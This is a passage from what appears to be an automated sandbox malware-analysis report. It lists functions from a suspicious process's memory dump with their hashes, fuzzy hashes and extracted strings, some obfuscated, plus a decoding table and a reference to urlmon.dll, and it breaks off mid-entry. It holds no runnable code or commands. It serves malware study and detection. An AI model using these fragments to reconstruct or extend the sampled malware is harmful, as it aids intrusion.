                                  • Instruction Fuzzy Hash: C011BAB1D21229AF8B40CFAD99805DDBFF8FA09620F50866BE818E7250D37096018FD5
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 03A7ECA8 Relevance: .0, Instructions: 47COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000015.00000002.3568923150.00000000038D0000.00000040.00000001.00040000.00000000.sdmp, Offset: 038D0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_21_2_38d0000_TsrCaEwNrfOKANGWcsg.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: e3dc350ad7992f4025265e86a9489379d97c063344347db72ca276ed82ed7fd2
                                  • Instruction ID: da73ca005f3cb15fcd3c2a577d39c4f2df800ff50d8a481393942e98d0c9aed7
                                  • Opcode Fuzzy Hash: e3dc350ad7992f4025265e86a9489379d97c063344347db72ca276ed82ed7fd2
                                  • Instruction Fuzzy Hash: 5F01C0B6214209BBCB44DE99DC80EEB77ADAF8C710F408109BA0DA7240D630EC518BA4
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 03A5AA98 Relevance: .0, Instructions: 40COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000015.00000002.3568923150.00000000038D0000.00000040.00000001.00040000.00000000.sdmp, Offset: 038D0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_21_2_38d0000_TsrCaEwNrfOKANGWcsg.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: e9a24ad5fbe418cbf7532914b32c5914bd022758bbb30caf76b39e6cd8263c94
                                  • Instruction ID: 42072341b03b52e7188d0b9669aac7b6e658c18773039af335eb37965129452c
                                  • Opcode Fuzzy Hash: e9a24ad5fbe418cbf7532914b32c5914bd022758bbb30caf76b39e6cd8263c94
                                  • Instruction Fuzzy Hash: 46F0A7B37543566BE7109A6DED80B86F7DCEB85330F240223FE1C8B241D671E45183A0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 03A6E452 Relevance: .0, Instructions: 34COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000015.00000002.3568923150.00000000038D0000.00000040.00000001.00040000.00000000.sdmp, Offset: 038D0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_21_2_38d0000_TsrCaEwNrfOKANGWcsg.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 663fdf87675e0710fee2000c7599afa8bf396691533290e39bb7e98d9fa677ef
                                  • Instruction ID: 0889b795a6999df59a7218cef252d658f13707eaf9c6b6e75578ae7bd85c187d
                                  • Opcode Fuzzy Hash: 663fdf87675e0710fee2000c7599afa8bf396691533290e39bb7e98d9fa677ef
                                  • Instruction Fuzzy Hash: 84F089B5D45318BEDF10FBF4DD88EABB3FCEB18214F000196E8099A351D63199844B61
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 03A7DF38 Relevance: .0, Instructions: 33COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000015.00000002.3568923150.00000000038D0000.00000040.00000001.00040000.00000000.sdmp, Offset: 038D0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_21_2_38d0000_TsrCaEwNrfOKANGWcsg.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: ad0fa554d952707d474ddc9fb9736fb7f948fbb030b1570bb15a7ca2a9151d13
                                  • Instruction ID: 848cfec3dc6cd934dc0e3b8c0533060d99885fcf01430ca2eece0a8084a08059
                                  • Opcode Fuzzy Hash: ad0fa554d952707d474ddc9fb9736fb7f948fbb030b1570bb15a7ca2a9151d13
                                  • Instruction Fuzzy Hash: A4F01CB5200315BBCB10DF99DC81E9B77ACEF89710F10800AF918A7341D670F9118BB4
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 03A6E3B8 Relevance: .0, Instructions: 29COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000015.00000002.3568923150.00000000038D0000.00000040.00000001.00040000.00000000.sdmp, Offset: 038D0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_21_2_38d0000_TsrCaEwNrfOKANGWcsg.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 17e63730570b8b109076dbdd3dff8216ed19a60b3c7ee33549029bc6de942bd8
                                  • Instruction ID: a089d73002956e6b689008b81532945bf0af5b1613d67f5a7b86479efa114849
                                  • Opcode Fuzzy Hash: 17e63730570b8b109076dbdd3dff8216ed19a60b3c7ee33549029bc6de942bd8
                                  • Instruction Fuzzy Hash: 33F05E75815208ABDB14CF64D981BDDBBB8EB44320F2043AAE8249B280D63497508781
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 03A7EBC8 Relevance: .0, Instructions: 29COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000015.00000002.3568923150.00000000038D0000.00000040.00000001.00040000.00000000.sdmp, Offset: 038D0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_21_2_38d0000_TsrCaEwNrfOKANGWcsg.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: fc8b3c178ccdfb88de354c7e46c3f6b4553945cf9241886c4d3a36b578cca239
                                  • Instruction ID: e8bca310b600338cf760561eaddb46145d52afdaa98f20a5b2bf05049e06ceb1
                                  • Opcode Fuzzy Hash: fc8b3c178ccdfb88de354c7e46c3f6b4553945cf9241886c4d3a36b578cca239
                                  • Instruction Fuzzy Hash: B1E06D753003047BD610EE59DC85E9B73ACEFC9710F00001AF918A7240D630B91087B5
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 03A5AA8D Relevance: .0, Instructions: 29COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000015.00000002.3568923150.00000000038D0000.00000040.00000001.00040000.00000000.sdmp, Offset: 038D0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_21_2_38d0000_TsrCaEwNrfOKANGWcsg.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 78f8a0b33b5616e40c9146be88367f8600c9345cd3392214df8dc88613292ad2
                                  • Instruction ID: 4a387c3ee0319b6b0499e7a80a865bcc9f8ddaf8e3d5ba94cc898fe915b5a619
                                  • Opcode Fuzzy Hash: 78f8a0b33b5616e40c9146be88367f8600c9345cd3392214df8dc88613292ad2
                                  • Instruction Fuzzy Hash: DBE0D8725183562B8711566E9C4488AFBDCED862303244327F9AC47251D531A41187A0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 03A80888 Relevance: .0, Instructions: 28COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000015.00000002.3568923150.00000000038D0000.00000040.00000001.00040000.00000000.sdmp, Offset: 038D0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_21_2_38d0000_TsrCaEwNrfOKANGWcsg.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 465d4967e091cd93b7812bb279ed3c69b480105602e6bc70c24fb9a13be28d75
                                  • Instruction ID: 09e0069544c1ec2874b5a366212e286201cb2091ffc59a8b26c7fd6b5356ab7d
                                  • Opcode Fuzzy Hash: 465d4967e091cd93b7812bb279ed3c69b480105602e6bc70c24fb9a13be28d75
                                  • Instruction Fuzzy Hash: FCE04F3660131437D720E7999D05F9BB75CCBC6E60F09046AFE089B340E5A0B94442E5
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 03A7E8B8 Relevance: .0, Instructions: 25COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000015.00000002.3568923150.00000000038D0000.00000040.00000001.00040000.00000000.sdmp, Offset: 038D0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_21_2_38d0000_TsrCaEwNrfOKANGWcsg.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 43d2ed2439114ee81b7b232533c9cb5fa2a1d2599db66f1e43638d96395448c1
                                  • Instruction ID: 022494fd466a80fd7d109417cae98fe923a61cb778b55dc43b1f6337afbd4308
                                  • Opcode Fuzzy Hash: 43d2ed2439114ee81b7b232533c9cb5fa2a1d2599db66f1e43638d96395448c1
                                  • Instruction Fuzzy Hash: DDE04636300304BBC620EB59CC41F9BB76CEFCA721F004416FA08AB281C670B90087A1
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Non-executed Functions

                                  Function 03A6A616 Relevance: 51.4, Strings: 41, Instructions: 168COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000015.00000002.3568923150.00000000038D0000.00000040.00000001.00040000.00000000.sdmp, Offset: 038D0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_21_2_38d0000_TsrCaEwNrfOKANGWcsg.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: !"#$$%&'($)*+,$-./0$123@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@@@@@$@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@>@@@?456789:;<=@@@@@@@
                                  • API String ID: 0-3248090998
                                  • Opcode ID: bd81fdc555417375a6dd5530808b7d3d63d96db1923ea4c9ffbe9c4385eafaa3
                                  • Instruction ID: 476a26c2bedf79566711faca0f43587a1dc132c75328ee1770faee958177ad9c
                                  • Opcode Fuzzy Hash: bd81fdc555417375a6dd5530808b7d3d63d96db1923ea4c9ffbe9c4385eafaa3
                                  • Instruction Fuzzy Hash: 5291F0F08052A98ACB118F55A5603DFBF71BB95204F1581EDC6A97B243C3BE4E46DF90
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 03A6A618 Relevance: 51.4, Strings: 41, Instructions: 166COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000015.00000002.3568923150.00000000038D0000.00000040.00000001.00040000.00000000.sdmp, Offset: 038D0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_21_2_38d0000_TsrCaEwNrfOKANGWcsg.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: !"#$$%&'($)*+,$-./0$123@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@@@@@$@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@>@@@?456789:;<=@@@@@@@
                                  • API String ID: 0-3248090998
                                  • Opcode ID: 88d2f9759e5af378ae688ea4fd5311552ce04c6e866e263db9e13d76fe42414d
                                  • Instruction ID: c18380ce0261a8baecb795f9826ea7d1c1463ef890649dd551c9c3cdeb668b17
                                  • Opcode Fuzzy Hash: 88d2f9759e5af378ae688ea4fd5311552ce04c6e866e263db9e13d76fe42414d
                                  • Instruction Fuzzy Hash: 8F91F1F08052998ACB118F55A5603DFBF71BB95204F1581EDC6A97B243C3BE4E46DF90
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 03A5A5C8 Relevance: 43.8, Strings: 35, Instructions: 54COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000015.00000002.3568923150.00000000038D0000.00000040.00000001.00040000.00000000.sdmp, Offset: 038D0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_21_2_38d0000_TsrCaEwNrfOKANGWcsg.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: "h0$"%7k$"?$/$"h&7$$ma#3$& "h$&) "$&1.!$&3.($&77+$) km$)"#j$)h?/$+.$&$+k&7$.$&3$.()h$.*& $3"?3$3*+l$3.()$7+.$$?*+k$?*+|$G$h/3*$h4. $hm|6$k&77$k.*&$t|6z$t|6zwip$wip$|1z%$~k.*
                                  • API String ID: 0-2699883798
                                  • Opcode ID: e391d030b7103594f3237a7c52ed90e355939f36854f60d19a6a08a1b115ccfa
                                  • Instruction ID: 76387311cbcad19af88c9da05149cc456a14351c01ef8307219717fdf357bf79
                                  • Opcode Fuzzy Hash: e391d030b7103594f3237a7c52ed90e355939f36854f60d19a6a08a1b115ccfa
                                  • Instruction Fuzzy Hash: F831C7B4C153089BCB24DFD6AA8529CBF70BB04340FA0924DD0586E245DBB82A86CF94
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 03A5A5B9 Relevance: 41.3, Strings: 33, Instructions: 95COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000015.00000002.3568923150.00000000038D0000.00000040.00000001.00040000.00000000.sdmp, Offset: 038D0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_21_2_38d0000_TsrCaEwNrfOKANGWcsg.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: "h0$"%7k$"?$/$"h&7$$ma#$$ma#3$& "h$&) "$&1.!$&3.($) km$)"#j$+.$&$+k&7$.$&3$.()h$.*& $3"?3$3.()$7+.$$?*+|$Ama%$'- 5$ma#3$G$h/3*$h4. $hm|6$k&77$k.*&$t|6z$t|6zwip$wip$|1z%$~k.*
                                  • API String ID: 0-1543310602
                                  • Opcode ID: ead7f5ac27493d03530623e2f0f011b3f2f4cab2cb11cbc99f98882575071ba8
                                  • Instruction ID: e5e6e4b6213865a629de132a0d3e2b473a6da59b764c83d6d8b16b36fec6b648
                                  • Opcode Fuzzy Hash: ead7f5ac27493d03530623e2f0f011b3f2f4cab2cb11cbc99f98882575071ba8
                                  • Instruction Fuzzy Hash: 6D4132B4C1524C9BCB25DFD5EA8469CBF74FB04200FA4929DE8086F201D7B95A45CF91
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 03A78368 Relevance: 34.0, Strings: 27, Instructions: 261COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000015.00000002.3568923150.00000000038D0000.00000040.00000001.00040000.00000000.sdmp, Offset: 038D0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_21_2_38d0000_TsrCaEwNrfOKANGWcsg.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: $$$$%$)$)$.$5$>$B$E$F$F$H$J$Q$T$g$h$i$m$s$u$urlmon.dll$v$w$}$}
                                  • API String ID: 0-1002149817
                                  • Opcode ID: 1658b8f9012b4ecf80aec0445eddc73098335c5d8c044a692df3d88d9f37cde8
                                  • Instruction ID: 3a38e716fb643e296b84113cc948f6f502abcd70b8192d30bb027e8c9a47775a
                                  • Opcode Fuzzy Hash: 1658b8f9012b4ecf80aec0445eddc73098335c5d8c044a692df3d88d9f37cde8
                                  • Instruction Fuzzy Hash: FBC11EB5D00368AEDB60DFA4CD45BEEBBB8AF45304F00419AE54CBB241D7B54A88CF91
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 03A60BBB Relevance: 32.6, Strings: 26, Instructions: 134COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000015.00000002.3568923150.00000000038D0000.00000040.00000001.00040000.00000000.sdmp, Offset: 038D0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_21_2_38d0000_TsrCaEwNrfOKANGWcsg.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: !,$3C$7$72$>V$@)$EJ$G$JB$JW$Q8$R$Ug$Z$[$^$d$j$oB$pW$v$v|$yK$yk$|$>
                                  • API String ID: 0-3082776261
                                  • Opcode ID: f4f7e5178675496dac0e486584b53debfd405c595847c99cfc1b98dc36107c9c
                                  • Instruction ID: bd6406ba18d90ae9d933423571c1b85819cba69cb562a0acb6b46df9c1f4f38c
                                  • Opcode Fuzzy Hash: f4f7e5178675496dac0e486584b53debfd405c595847c99cfc1b98dc36107c9c
                                  • Instruction Fuzzy Hash: 9A9128B0D05269CBEB64CF85C9587DEBBB1BB45308F5081D9C14C7B281DBBA1A89CF85
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 03A757D8 Relevance: 25.2, Strings: 20, Instructions: 247COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000015.00000002.3568923150.00000000038D0000.00000040.00000001.00040000.00000000.sdmp, Offset: 038D0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_21_2_38d0000_TsrCaEwNrfOKANGWcsg.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: $2$I$I$\$e$g$i$l$l$m$o$r$r$r$r$t$t$t$x
                                  • API String ID: 0-3236418099
                                  • Opcode ID: e58c25dfbdb9db69c621e96788b759fe59851b52c732ab89618de021f60506dd
                                  • Instruction ID: 38cab77405b87e3e57b7920e325282b81ec5e94feb5f3b788beccb228ff1b8bd
                                  • Opcode Fuzzy Hash: e58c25dfbdb9db69c621e96788b759fe59851b52c732ab89618de021f60506dd
                                  • Instruction Fuzzy Hash: 729167B5D00318AAEB50EF948D85FEE77BCEF45704F0441AAE50CAA240EB715B89CF51
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 03A757D4 Relevance: 25.1, Strings: 20, Instructions: 97COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000015.00000002.3568923150.00000000038D0000.00000040.00000001.00040000.00000000.sdmp, Offset: 038D0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_21_2_38d0000_TsrCaEwNrfOKANGWcsg.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: $2$I$I$\$e$g$i$l$l$m$o$r$r$r$r$t$t$t$x
                                  • API String ID: 0-3236418099
                                  • Opcode ID: b78fcbd1caaff72ff9777407cb6510fcd9e62f9bd6234064cc4ca57d431ae6be
                                  • Instruction ID: 6cdb62ba021403fee071b6f676a1a17bca54e829368ded3890f3ff600d3bd833
                                  • Opcode Fuzzy Hash: b78fcbd1caaff72ff9777407cb6510fcd9e62f9bd6234064cc4ca57d431ae6be
                                  • Instruction Fuzzy Hash: 77410AB0D0031CEEEB60EFA58984BDEBBB9FF05744F5041AA950CAA241D7B54B89CF51
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 03A5A6F8 Relevance: 25.1, Strings: 20, Instructions: 56COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000015.00000002.3568923150.00000000038D0000.00000040.00000001.00040000.00000000.sdmp, Offset: 038D0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_21_2_38d0000_TsrCaEwNrfOKANGWcsg.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: %'d$+>-$!'/+$&-(!$((%k$*k|j$+*!d$-/!d$0krt$6-kr$67-+$D$hd(-$jp$qjtd$td+$tjuj$ttju$ttjujp$upwd
                                  • API String ID: 0-3443844759
                                  • Opcode ID: 7acf9eb82d2399fbb966cf03b0ed30e9195b7a4753f580493b77af4799f88ad7
                                  • Instruction ID: 317af1069924fb7edf09de05a71c1f6b0ee6ca8665cbd40049b6a11af6068831
                                  • Opcode Fuzzy Hash: 7acf9eb82d2399fbb966cf03b0ed30e9195b7a4753f580493b77af4799f88ad7
                                  • Instruction Fuzzy Hash: 9C31D8B0C017988ACF29CF95EA812DDBF70BB01740F608688E5597B291DB358A46CFA5
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 03A5A6F5 Relevance: 25.1, Strings: 20, Instructions: 55COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000015.00000002.3568923150.00000000038D0000.00000040.00000001.00040000.00000000.sdmp, Offset: 038D0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_21_2_38d0000_TsrCaEwNrfOKANGWcsg.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: %'d$+>-$!'/+$&-(!$((%k$*k|j$+*!d$-/!d$0krt$6-kr$67-+$D$hd(-$jp$qjtd$td+$tjuj$ttju$ttjujp$upwd
                                  • API String ID: 0-3443844759
                                  • Opcode ID: f76ca41e0e378e9d694578472da24b00dca5bb26151958a3600d21d0b7d16fec
                                  • Instruction ID: fc1f679fa47dff9ec8aa820273a0a097749ca8be226481637b2a51aea813061e
                                  • Opcode Fuzzy Hash: f76ca41e0e378e9d694578472da24b00dca5bb26151958a3600d21d0b7d16fec
                                  • Instruction Fuzzy Hash: 0C31DAB0C016988ACF29CF95EA812DDBF70BB01740F608688E4597F291DB358A46CFA5
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 03A711C8 Relevance: 16.4, Strings: 13, Instructions: 189COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000015.00000002.3568923150.00000000038D0000.00000040.00000001.00040000.00000000.sdmp, Offset: 038D0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_21_2_38d0000_TsrCaEwNrfOKANGWcsg.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: $.$F$P$e$i$l$m$o$o$r$s$x
                                  • API String ID: 0-392141074
                                  • Opcode ID: be93e2303832c0b43f56d05006dd121f4735a2f92ffdac9b14b19e23c62047e6
                                  • Instruction ID: a223c8e127dadb8f30fe6c4bbaeb1f55754a0e6c6193d3e4f22ffdb7a7c5a669
                                  • Opcode Fuzzy Hash: be93e2303832c0b43f56d05006dd121f4735a2f92ffdac9b14b19e23c62047e6
                                  • Instruction Fuzzy Hash: D57132B5D00318AADB25EBA4CD45FEEB77CBF04704F04459EE609AB240EB7467488FA1
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 03A6C4A8 Relevance: 15.2, Strings: 12, Instructions: 230COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000015.00000002.3568923150.00000000038D0000.00000040.00000001.00040000.00000000.sdmp, Offset: 038D0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_21_2_38d0000_TsrCaEwNrfOKANGWcsg.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: "$"$"$.$/$P$e$i$m$o$r$x
                                  • API String ID: 0-2356907671
                                  • Opcode ID: 82800f2ab60f1ed3fbb6614186751d90bed5001dafc6535b17d257cd6bd952c9
                                  • Instruction ID: c60eea8a35f9ddd727df70ac87f21b5d2658dff68b8d0361314473d5a45bd0fd
                                  • Opcode Fuzzy Hash: 82800f2ab60f1ed3fbb6614186751d90bed5001dafc6535b17d257cd6bd952c9
                                  • Instruction Fuzzy Hash: A78184B5C003187AEBA1FBA48D81FEF73BCAF44700F44459AA50DAA241EB759749CF61
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 03A65308 Relevance: 13.8, Strings: 11, Instructions: 84COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000015.00000002.3568923150.00000000038D0000.00000040.00000001.00040000.00000000.sdmp, Offset: 038D0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_21_2_38d0000_TsrCaEwNrfOKANGWcsg.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: D$\$e$e$i$l$n$r$r$w$x
                                  • API String ID: 0-685823316
                                  • Opcode ID: 6408de79ac2a0bb23d5ebf01fb0c1388c9b2f0332ba48e7365187f5b69046419
                                  • Instruction ID: e6780c4733e5d9c5a81cbaed475fc1f2c899fda1b193749ded1554a64d640b06
                                  • Opcode Fuzzy Hash: 6408de79ac2a0bb23d5ebf01fb0c1388c9b2f0332ba48e7365187f5b69046419
                                  • Instruction Fuzzy Hash: 392182B5D50318AAEF50DFE4CC45BEEBBB9BF04704F04815DE618BA280DBB556488BA4
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 03A652FF Relevance: 13.8, Strings: 11, Instructions: 84COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000015.00000002.3568923150.00000000038D0000.00000040.00000001.00040000.00000000.sdmp, Offset: 038D0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_21_2_38d0000_TsrCaEwNrfOKANGWcsg.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: D$\$e$e$i$l$n$r$r$w$x
                                  • API String ID: 0-685823316
                                  • Opcode ID: 4774ee21c3d57bc1bcbdee0dacdfb55f48c980ae4e48b577dfbf3759b1917737
                                  • Instruction ID: 0080f5a65ae3a04fd2cb9d5e08767a8a23ee733bd37f6fa86f3acf6edb267eb5
                                  • Opcode Fuzzy Hash: 4774ee21c3d57bc1bcbdee0dacdfb55f48c980ae4e48b577dfbf3759b1917737
                                  • Instruction Fuzzy Hash: C62195B5D40318AADF50DF90CC44BEE7BB9BF04700F04815DE6187B280DBB516488BA4
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 03A75C78 Relevance: 12.8, Strings: 10, Instructions: 342COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000015.00000002.3568923150.00000000038D0000.00000040.00000001.00040000.00000000.sdmp, Offset: 038D0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_21_2_38d0000_TsrCaEwNrfOKANGWcsg.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: :$:$:$A$I$N$P$m$s$t
                                  • API String ID: 0-2304485323
                                  • Opcode ID: 07d59cf05007bf9f15a21986f78f87fb25fadd0ee218115dfc24b051170945ce
                                  • Instruction ID: 4c7ed7ed0c9e39e7dde4378774f391d0794887c29827aef0056aa15023dfa3f4
                                  • Opcode Fuzzy Hash: 07d59cf05007bf9f15a21986f78f87fb25fadd0ee218115dfc24b051170945ce
                                  • Instruction Fuzzy Hash: 97D1E8B5900304ABEB54EFE4CD85FEEB3B8BF48304F44451EE119EB240EB79A9058B60
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 03A75C73 Relevance: 12.7, Strings: 10, Instructions: 212COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000015.00000002.3568923150.00000000038D0000.00000040.00000001.00040000.00000000.sdmp, Offset: 038D0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_21_2_38d0000_TsrCaEwNrfOKANGWcsg.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: :$:$:$A$I$N$P$m$s$t
                                  • API String ID: 0-2304485323
                                  • Opcode ID: 2edd53159aefae68e0b0b990041ee707b8f17408228397ca42f5349c7229f87d
                                  • Instruction ID: df5e3e64b33568bf95d2d712d245f32fe3986fe7e9a968baaf0596809fa7bef0
                                  • Opcode Fuzzy Hash: 2edd53159aefae68e0b0b990041ee707b8f17408228397ca42f5349c7229f87d
                                  • Instruction Fuzzy Hash: 4081D5B5D00348ABDB54EFE4CD85BEEB7B8BF48304F44451EE119EB240E7B5A9058B64
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 03A78BB8 Relevance: 8.9, Strings: 7, Instructions: 115COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000015.00000002.3568923150.00000000038D0000.00000040.00000001.00040000.00000000.sdmp, Offset: 038D0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_21_2_38d0000_TsrCaEwNrfOKANGWcsg.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: L$S$\$a$c$e$l
                                  • API String ID: 0-3322591375
                                  • Opcode ID: 9aa4d9fd45fa56ce4a1a85acf37daf9b7fc557d5f3c530a4f8a6323d230bf262
                                  • Instruction ID: c63ac6cc741333ff6655c51877cf50de1c47d3b992207dbc73a89a762285cea6
                                  • Opcode Fuzzy Hash: 9aa4d9fd45fa56ce4a1a85acf37daf9b7fc557d5f3c530a4f8a6323d230bf262
                                  • Instruction Fuzzy Hash: F141B672C11318BADB60EFA4DC89AEEB7F8EF48700F05465BD50DAB200E77559458B90
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 03A70F98 Relevance: 7.7, Strings: 6, Instructions: 168COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
